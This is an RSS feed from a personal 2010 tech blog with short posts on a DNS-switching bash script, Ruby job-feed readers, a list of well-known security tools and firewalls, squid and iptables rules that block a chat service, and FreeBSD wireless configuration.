<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
	xmlns:media="http://search.yahoo.com/mrss/"
>

<channel>
	<title>Albertux~# ./Blog &#187; network</title>
	<atom:link href="http://albertux.ayalasoft.com/es/category/network/feed/" rel="self" type="application/rss+xml" />
	<link>http://albertux.ayalasoft.com</link>
	<description>61 20 64 65 76 65 6c 6f 70 65 72 20 6c 69 66 65</description>
	<lastBuildDate>Thu, 01 Jul 2010 16:23:33 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
	<!-- podcast_generator="podPress/8.8" - maintenance_release="8.8.5.3" -->
	<copyright>Copyright &#38;#xA9; 2010 Albertux~# ./Blog </copyright>
	<managingEditor>albertoi7@gmail.com</managingEditor>
	<webMaster>albertoi7@gmail.com</webMaster>
	<category>posts</category>
	<ttl>1440</ttl>
	<image>
		<url>http://ayalasoft.com/img/podcast02.jpg</url>
		<title>Albertux~# ./Blog &#187; network</title>
		<link>http://albertux.ayalasoft.com</link>
		<width>144</width>
		<height>144</height>
	</image>
	<itunes:subtitle></itunes:subtitle>
	<itunes:summary>After three days without programming, life becomes meaningless.</itunes:summary>
	<itunes:keywords></itunes:keywords>
	<itunes:category text="Technology">
		<itunes:category text="Software How-To" />
	</itunes:category>
	<itunes:category text="Technology">
		<itunes:category text="Podcasting" />
	</itunes:category>
	<itunes:author></itunes:author>
	<itunes:owner>
		<itunes:name></itunes:name>
		<itunes:email>albertoi7@gmail.com</itunes:email>
	</itunes:owner>
	<itunes:block>no</itunes:block>
	<itunes:explicit>no</itunes:explicit>
	<itunes:image href="http://ayalasoft.com/img/podcast01.jpg" />
		<item>
		<title>Switch DNS</title>
		<link>http://albertux.ayalasoft.com/es/2010/07/01/switch-dns/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/07/01/switch-dns/#comments</comments>
		<pubDate>Thu, 01 Jul 2010 16:23:33 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[dns]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=3366</guid>
		<description><![CDATA[#!/bin/bash # Author: Albertux (Alberto Isaac Ayala Esquivias) # Script: switch the nameservers (DNS) &#160; if &#91; ! $&#40; id -u &#41; -eq 0 &#93; then echo &#34;Run this script as root&#34; exit fi &#160; if &#91; $# -le 0 &#93; then echo &#34;Usage $0 [open&#124;google&#124;comodo&#124;old]&#34; fi &#160; if &#91; ! -f /etc/resolv.conf.bak &#93; then [...]<p><a href="http://albertux.ayalasoft.com/es/2010/07/01/switch-dns/">Switch DNS</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[
<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>
<span style="color: #666666; font-style: italic;"># Author: Albertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color: #666666; font-style: italic;"># Script: switch the nameservers (DNS)</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000; font-weight: bold;">!</span> $<span style="color: #7a0874; font-weight: bold;">&#40;</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #660033;">-u</span> <span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #660033;">-eq</span> <span style="color: #000000;">0</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Run this script as root&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">exit</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #007800;">$#</span> <span style="color: #660033;">-le</span> <span style="color: #000000;">0</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Usage $0 [open|google|comodo|old]&quot;</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span>  <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000; font-weight: bold;">!</span> <span style="color: #660033;">-f</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf.bak <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf.bak
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">case</span> $<span style="color: #000000;">1</span> <span style="color: #000000; font-weight: bold;">in</span>
	open<span style="color: #7a0874; font-weight: bold;">&#41;</span>
		<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;# OpenDNS<span style="color: #000099; font-weight: bold;">\n</span>nameserver 208.67.222.222<span style="color: #000099; font-weight: bold;">\n</span>nameserver 208.67.220.220&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf
	<span style="color: #000000; font-weight: bold;">;;</span>
	google<span style="color: #7a0874; font-weight: bold;">&#41;</span>
		<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;# Google Public DNS<span style="color: #000099; font-weight: bold;">\n</span>nameserver 8.8.8.8<span style="color: #000099; font-weight: bold;">\n</span>nameserver 8.8.4.4&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf
	<span style="color: #000000; font-weight: bold;">;;</span>
	comodo<span style="color: #7a0874; font-weight: bold;">&#41;</span>
		<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;# Comodo Secure DNS<span style="color: #000099; font-weight: bold;">\n</span>nameserver 156.154.70.22<span style="color: #000099; font-weight: bold;">\n</span>nameserver 156.154.71.22&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf
	<span style="color: #000000; font-weight: bold;">;;</span>
	old<span style="color: #7a0874; font-weight: bold;">&#41;</span>
		<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf.bak <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>resolv.conf 
	<span style="color: #000000; font-weight: bold;">;;</span>
<span style="color: #000000; font-weight: bold;">esac</span></pre></div></div>

<p><a href="http://albertux.ayalasoft.com/es/2010/07/01/switch-dns/">Switch DNS</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/07/01/switch-dns/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ruby Help Me to Find a Job</title>
		<link>http://albertux.ayalasoft.com/es/2010/06/22/ruby-help-me-to-find-a-job/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/06/22/ruby-help-me-to-find-a-job/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 20:11:47 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[craigslist]]></category>
		<category><![CDATA[indeed]]></category>
		<category><![CDATA[ruby]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=3296</guid>
		<description><![CDATA[Ruby Help Me to Find a Job On Indeed: #!/usr/bin/ruby -w # Autor: Albertux (Alberto Isaac Ayala Esquivias) # URL/Blog: http://Albertux.AyalaSoft.com # E-mail/spam: &#60;albertoi7@gmail.com&#62; # Free Coke License: If you see me some day give me a free coke please. # Description: This script maybe help people to find a fucking Job &#160; require &#34;rss/2.0&#34; [...]<p><a href="http://albertux.ayalasoft.com/es/2010/06/22/ruby-help-me-to-find-a-job/">Ruby Help Me to Find a Job</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Ruby Help Me to Find a Job</strong></p>
<p>On Indeed:</p>

<div class="wp_syntax"><div class="code"><pre class="ruby" style="font-family:monospace;"><span style="color:#008000; font-style:italic;">#!/usr/bin/ruby -w</span>
<span style="color:#008000; font-style:italic;"># Autor: Albertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color:#008000; font-style:italic;"># URL/Blog: http://Albertux.AyalaSoft.com</span>
<span style="color:#008000; font-style:italic;"># E-mail/spam: &lt;albertoi7@gmail.com&gt;</span>
<span style="color:#008000; font-style:italic;"># Free Coke License: If you see me some day give me a free coke please.</span>
<span style="color:#008000; font-style:italic;"># Description: This script maybe help people to find a fucking Job</span>
&nbsp;
<span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">&quot;rss/2.0&quot;</span>
<span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">&quot;open-uri&quot;</span>
<span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'net/http'</span>
<span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'rexml/document'</span>
&nbsp;
<span style="color:#008000; font-style:italic;"># You need to change this values:</span>
keywords = <span style="color:#996600;">&quot;keyword1+keyword2+keyword3&quot;</span>
zipcode = <span style="color:#996600;">&quot;10101&quot;</span>
&nbsp;
<span style="color:#9966CC; font-weight:bold;">def</span> bitly<span style="color:#006600; font-weight:bold;">&#40;</span>url<span style="color:#006600; font-weight:bold;">&#41;</span>
	<span style="color:#008000; font-style:italic;"># Create account on Bit.ly</span>
	login = <span style="color:#996600;">&quot;&quot;</span>
	api_key = <span style="color:#996600;">&quot;&quot;</span>
	data = <span style="color:#6666ff; font-weight:bold;">Net::HTTP</span>.<span style="color:#9900CC;">get_response</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#CC00FF; font-weight:bold;">URI</span>.<span style="color:#9900CC;">parse</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;http://api.bit.ly/v3/shorten?login=&quot;</span><span style="color:#006600; font-weight:bold;">+</span>login<span style="color:#006600; font-weight:bold;">+</span><span style="color:#996600;">&quot;&amp;apiKey=&quot;</span><span style="color:#006600; font-weight:bold;">+</span>api_key<span style="color:#006600; font-weight:bold;">+</span><span style="color:#996600;">&quot;&amp;longUrl=&quot;</span><span style="color:#006600; font-weight:bold;">+</span>url<span style="color:#006600; font-weight:bold;">+</span><span style="color:#996600;">&quot;&amp;format=xml&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span><span style="color:#006600; font-weight:bold;">&#41;</span>.<span style="color:#9900CC;">body</span>
	doc = <span style="color:#6666ff; font-weight:bold;">REXML::Document</span>.<span style="color:#9900CC;">new</span><span style="color:#006600; font-weight:bold;">&#40;</span>data<span style="color:#006600; font-weight:bold;">&#41;</span>
	doc.<span style="color:#9900CC;">elements</span>.<span style="color:#9900CC;">each</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">'response/data/url'</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span>ele<span style="color:#006600; font-weight:bold;">|</span>
		url = ele.<span style="color:#9900CC;">text</span>
	<span style="color:#9966CC; font-weight:bold;">end</span>
	url
<span style="color:#9966CC; font-weight:bold;">end</span>
&nbsp;
<span style="color:#CC0066; font-weight:bold;">open</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;http://rss.indeed.com/rss?q=&quot;</span> <span style="color:#006600; font-weight:bold;">+</span> keywords <span style="color:#006600; font-weight:bold;">+</span> <span style="color:#996600;">&quot;&amp;l=&quot;</span> <span style="color:#006600; font-weight:bold;">+</span> zipcode <span style="color:#006600; font-weight:bold;">+</span> <span style="color:#996600;">&quot;&amp;sort=date&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span> http <span style="color:#006600; font-weight:bold;">|</span>
	response = http.<span style="color:#9900CC;">read</span>
	result = <span style="color:#6666ff; font-weight:bold;">RSS::Parser</span>.<span style="color:#9900CC;">parse</span><span style="color:#006600; font-weight:bold;">&#40;</span>response, <span style="color:#0000FF; font-weight:bold;">false</span><span style="color:#006600; font-weight:bold;">&#41;</span>
	<span style="color:#CC0066; font-weight:bold;">puts</span> <span style="color:#996600;">&quot;<span style="color:#000099;">\n</span>Channel: &quot;</span> <span style="color:#006600; font-weight:bold;">+</span> result.<span style="color:#9900CC;">channel</span>.<span style="color:#9900CC;">title</span> <span style="color:#006600; font-weight:bold;">+</span> <span style="color:#996600;">&quot;<span style="color:#000099;">\n</span><span style="color:#000099;">\n</span>&quot;</span>
	result.<span style="color:#9900CC;">items</span>.<span style="color:#9900CC;">each_with_index</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span> item, i<span style="color:#006600; font-weight:bold;">|</span>
		<span style="color:#CC0066; font-weight:bold;">puts</span> <span style="color:#996600;">&quot;#{i+1}. #{item.title} ( &quot;</span> <span style="color:#006600; font-weight:bold;">+</span> bitly<span style="color:#006600; font-weight:bold;">&#40;</span>item.<span style="color:#9900CC;">link</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">+</span><span style="color:#996600;">&quot; )&quot;</span>
	<span style="color:#9966CC; font-weight:bold;">end</span>
<span style="color:#9966CC; font-weight:bold;">end</span></pre></div></div>

<p>On Craigslist:</p>

<div class="wp_syntax"><div class="code"><pre class="ruby" style="font-family:monospace;"><span style="color:#008000; font-style:italic;">#!/usr/bin/ruby -w</span>
<span style="color:#008000; font-style:italic;"># Autor: Albertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color:#008000; font-style:italic;"># URL/Blog: http://Albertux.AyalaSoft.com</span>
<span style="color:#008000; font-style:italic;"># E-mail/Spam: &lt;albertoi7@gmail.com&gt;</span>
<span style="color:#008000; font-style:italic;"># Free Coke License: If you see me some day give me a free coke please.</span>
<span style="color:#008000; font-style:italic;"># Description: This script maybe help people to find a fucking Job.</span>
&nbsp;
<span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">&quot;rss/1.0&quot;</span>
<span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">&quot;open-uri&quot;</span>
&nbsp;
<span style="color:#9966CC; font-weight:bold;">def</span> craigslist_reader<span style="color:#006600; font-weight:bold;">&#40;</span>feeds<span style="color:#006600; font-weight:bold;">&#41;</span>
	feeds.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span> feed <span style="color:#006600; font-weight:bold;">|</span>
		<span style="color:#CC0066; font-weight:bold;">open</span><span style="color:#006600; font-weight:bold;">&#40;</span>feed<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span> http <span style="color:#006600; font-weight:bold;">|</span>
			response = http.<span style="color:#9900CC;">read</span>
			result = <span style="color:#6666ff; font-weight:bold;">RSS::Parser</span>.<span style="color:#9900CC;">parse</span><span style="color:#006600; font-weight:bold;">&#40;</span>response, <span style="color:#0000FF; font-weight:bold;">false</span><span style="color:#006600; font-weight:bold;">&#41;</span>
			<span style="color:#CC0066; font-weight:bold;">puts</span> <span style="color:#996600;">&quot;<span style="color:#000099;">\n</span>Channel: &quot;</span> <span style="color:#006600; font-weight:bold;">+</span> result.<span style="color:#9900CC;">channel</span>.<span style="color:#9900CC;">title</span> <span style="color:#006600; font-weight:bold;">+</span> <span style="color:#996600;">&quot;<span style="color:#000099;">\n</span><span style="color:#000099;">\n</span>&quot;</span>
			result.<span style="color:#9900CC;">items</span>.<span style="color:#9900CC;">each_with_index</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span> item, i<span style="color:#006600; font-weight:bold;">|</span>
				<span style="color:#CC0066; font-weight:bold;">puts</span> <span style="color:#996600;">&quot;#{i+1}. #{item.title} #{item.link}&quot;</span> <span style="color:#9966CC; font-weight:bold;">if</span> i <span style="color:#006600; font-weight:bold;">&lt;</span> <span style="color:#006666;">10</span>
			<span style="color:#9966CC; font-weight:bold;">end</span>
		<span style="color:#9966CC; font-weight:bold;">end</span>
	<span style="color:#9966CC; font-weight:bold;">end</span>
<span style="color:#9966CC; font-weight:bold;">end</span>
&nbsp;
craigslist_feeds = <span style="color:#006600; font-weight:bold;">&#91;</span>
		<span style="color:#996600;">&quot;http://sfbay.craigslist.org/sof/index.rss&quot;</span>,
		<span style="color:#996600;">&quot;http://sfbay.craigslist.org/web/index.rss&quot;</span>,
		<span style="color:#996600;">&quot;http://sfbay.craigslist.org/eng/index.rss&quot;</span>,
		<span style="color:#996600;">&quot;http://sfbay.craigslist.org/cpg/index.rss&quot;</span>
<span style="color:#006600; font-weight:bold;">&#93;</span>
&nbsp;
craigslist_reader<span style="color:#006600; font-weight:bold;">&#40;</span>craigslist_feeds<span style="color:#006600; font-weight:bold;">&#41;</span></pre></div></div>

<p><img src="http://ayalasoft.com/img/ruby-help-me-to-find-a-job.png"></p>
<p><a href="http://albertux.ayalasoft.com/es/2010/06/22/ruby-help-me-to-find-a-job/">Ruby Help Me to Find a Job</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/06/22/ruby-help-me-to-find-a-job/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Insecurity</title>
		<link>http://albertux.ayalasoft.com/es/2010/04/01/insecurity/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/04/01/insecurity/#comments</comments>
		<pubDate>Thu, 01 Apr 2010 23:30:13 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=1672</guid>
		<description><![CDATA[Insecurity Tools: Nikto.pl Web Scanner nmap Network Scanner Metasploit Framework wfuzz Brute Force Web App Wireshark Network Protocol Analyzer Snort IDS Nessus (vulnerability scanner) Hydra Cracker Password John the Ripper Cracker Password (Passive) Linux Distros: BackTrack Wireless Tools and others Damn Vulnerable Linux Others: http://sectools.org/ http://www.milw0rm.com/ http://www.exploit-db.com/ http://www.securityfocus.com/ Insecurity is a post from: Albertux~# ./Blog<p><a href="http://albertux.ayalasoft.com/es/2010/04/01/insecurity/">Insecurity</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Insecurity</strong></p>
<p>Tools:<br />
<a href="http://www.cirt.net/nikto2" target="_blank">Nikto.pl</a> Web Scanner<br />
<a href="http://www.nmap.org" target="_blank">nmap</a> Network Scanner<br />
<a href="http://www.metasploit.com/" target="_blank">Metasploit</a> Framework<br />
<a href="http://www.edge-security.com/wfuzz.php" target="_blank">wfuzz</a> Brute Force Web App<br />
<a href="http://www.wireshark.org/" target="_blank">Wireshark</a> Network Protocol Analyzer<br />
<a href="http://www.snort.org/" target="_blank">Snort</a> IDS<br />
<a href="http://www.nessus.org/" target="_blank">Nessus</a> (vulnerability scanner)<br />
<a href="http://freeworld.thc.org/thc-hydra/" target="_blank">Hydra</a> Cracker Password<br />
<a href="http://www.openwall.com/john/" target="_blank">John the Ripper</a> Cracker Password (Passive)</p>
<p>Linux Distros:<br />
<a href="http://www.backtrack-linux.org/" target="_blank">BackTrack</a> Wireless Tools and others<br />
<a href="http://www.damnvulnerablelinux.org/" target="_blank">Damn Vulnerable Linux</a> </p>
<p>Others:<br />
<a href="http://sectools.org/" target="_blank">http://sectools.org/</a><br />
<a href="http://www.milw0rm.com/" target="_blank">http://www.milw0rm.com/</a><br />
<a href="http://www.exploit-db.com/" target="_blank">http://www.exploit-db.com/</a><br />
<a href="http://www.securityfocus.com/" target="_blank">http://www.securityfocus.com/</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2010/04/01/insecurity/">Insecurity</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/04/01/insecurity/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Firewalls</title>
		<link>http://albertux.ayalasoft.com/es/2010/03/01/firewalls/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/03/01/firewalls/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 22:00:25 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[general]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[firewall]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=1846</guid>
		<description><![CDATA[Firewalls smothwall ipcop untangle endian m0n0wall vyatta pfsense Other option: install any linux flavor + squid + iptables Good option for windows users: http://personalfirewall.comodo.com/ Firewalls is a post from: Albertux~# ./Blog<p><a href="http://albertux.ayalasoft.com/es/2010/03/01/firewalls/">Firewalls</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Firewalls</strong></p>
<p><a href="http://www.smoothwall.org/" target="_blank">smothwall</a><br />
<a href="http://www.ipcop.org/" target="_blank">ipcop</a><br />
<a href="http://www.untangle.com/" target="_blank">untangle</a><br />
<a href="http://www.endian.com/" target="_blank">endian</a><br />
<a href="http://m0n0.ch/wall/" target="_blank">m0n0wall</a><br />
<a href="http://www.vyatta.com/" target="_blank">vyatta</a><br />
<a href="http://www.pfsense.com/" target="_blank">pfsense</a></p>
<p>Other option: install any linux flavor + squid + iptables</p>
<p>Good option for windows users: <a href="http://personalfirewall.comodo.com/" target="_blank">http://personalfirewall.comodo.com/</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2010/03/01/firewalls/">Firewalls</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/03/01/firewalls/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Block Messenger (squid + iptables)</title>
		<link>http://albertux.ayalasoft.com/es/2010/03/01/block-messenger-squid-iptables/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/03/01/block-messenger-squid-iptables/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 06:15:17 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[general]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[msn]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2208</guid>
		<description><![CDATA[Block Messenger (squid + iptables) In Mexico i was installed a firewall and squid on a server the important options are: squid.conf: acl no_permitido dstdomain "/etc/squid/blocked.domains" acl msn_mime req_mime_type -i ^application/x-msn-messenger$ acl msn_gw url_regex -i gateway.dll http_access deny all msn_mime http_access deny all msn_gw blocked.domains: .ebuddy.com .messengerfx.com .iloveim.com .meebo.com ... iptables: iptables -I FORWARD -p [...]<p><a href="http://albertux.ayalasoft.com/es/2010/03/01/block-messenger-squid-iptables/">Block Messenger (squid + iptables)</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Block Messenger (squid + iptables)</strong></p>
<p>In Mexico i was installed a firewall and squid on a server the important options are:</p>
<p>squid.conf:</p>
<pre>
acl no_permitido dstdomain "/etc/squid/blocked.domains"
acl msn_mime req_mime_type -i ^application/x-msn-messenger$
acl msn_gw url_regex -i gateway.dll
http_access deny all msn_mime
http_access deny all msn_gw
</pre>
<p>blocked.domains:</p>
<pre>
.ebuddy.com
.messengerfx.com
.iloveim.com
.meebo.com
...
</pre>
<p>iptables:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-I</span> FORWARD <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">1863</span> <span style="color: #660033;">-j</span> REJECT</pre></div></div>

<p><a href="http://albertux.ayalasoft.com/es/2010/03/01/block-messenger-squid-iptables/">Block Messenger (squid + iptables)</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/03/01/block-messenger-squid-iptables/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FreeBSD Wireless WEP/WAP</title>
		<link>http://albertux.ayalasoft.com/es/2010/02/28/freebsd-wireless-wep-wap/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/02/28/freebsd-wireless-wep-wap/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 00:00:47 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[bsd]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2399</guid>
		<description><![CDATA[FreeBSD Wireless WEP/WAP /etc/wpa_supplicant.conf # WEP network=&#123; ssid=&#34;YOUR_NETWORK&#34; key_mgmt=NONE wep_key0=6666666666 wep_tx_keyidx=0 priority=5 &#125; # WAP network=&#123; ssid=&#34;YOUR_NETWORK&#34; psk=&#34;Password&#34; priority=5 &#125; wpa_supplicant -Bi wlan0 -c /etc/wpa_supplicant.conf /etc/rc.conf ifconfig_wlan0=&#34;WPA DHCP&#34; In my case wlan0 is rum0 FreeBSD Wireless WEP/WAP is a post from: Albertux~# ./Blog<p><a href="http://albertux.ayalasoft.com/es/2010/02/28/freebsd-wireless-wep-wap/">FreeBSD Wireless WEP/WAP</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>FreeBSD Wireless WEP/WAP</strong></p>
<p>/etc/wpa_supplicant.conf</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># WEP</span>
<span style="color: #007800;">network</span>=<span style="color: #7a0874; font-weight: bold;">&#123;</span>
	<span style="color: #007800;">ssid</span>=<span style="color: #ff0000;">&quot;YOUR_NETWORK&quot;</span>
	<span style="color: #007800;">key_mgmt</span>=NONE
	<span style="color: #007800;">wep_key0</span>=<span style="color: #000000;">6666666666</span>
	<span style="color: #007800;">wep_tx_keyidx</span>=<span style="color: #000000;">0</span>
	<span style="color: #007800;">priority</span>=<span style="color: #000000;">5</span>
<span style="color: #7a0874; font-weight: bold;">&#125;</span>
<span style="color: #666666; font-style: italic;"># WAP</span>
<span style="color: #007800;">network</span>=<span style="color: #7a0874; font-weight: bold;">&#123;</span>
	<span style="color: #007800;">ssid</span>=<span style="color: #ff0000;">&quot;YOUR_NETWORK&quot;</span>
	<span style="color: #007800;">psk</span>=<span style="color: #ff0000;">&quot;Password&quot;</span>
	<span style="color: #007800;">priority</span>=<span style="color: #000000;">5</span>
<span style="color: #7a0874; font-weight: bold;">&#125;</span></pre></div></div>


<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">wpa_supplicant <span style="color: #660033;">-Bi</span> wlan0 <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>wpa_supplicant.conf</pre></div></div>

<p>/etc/rc.conf</p>

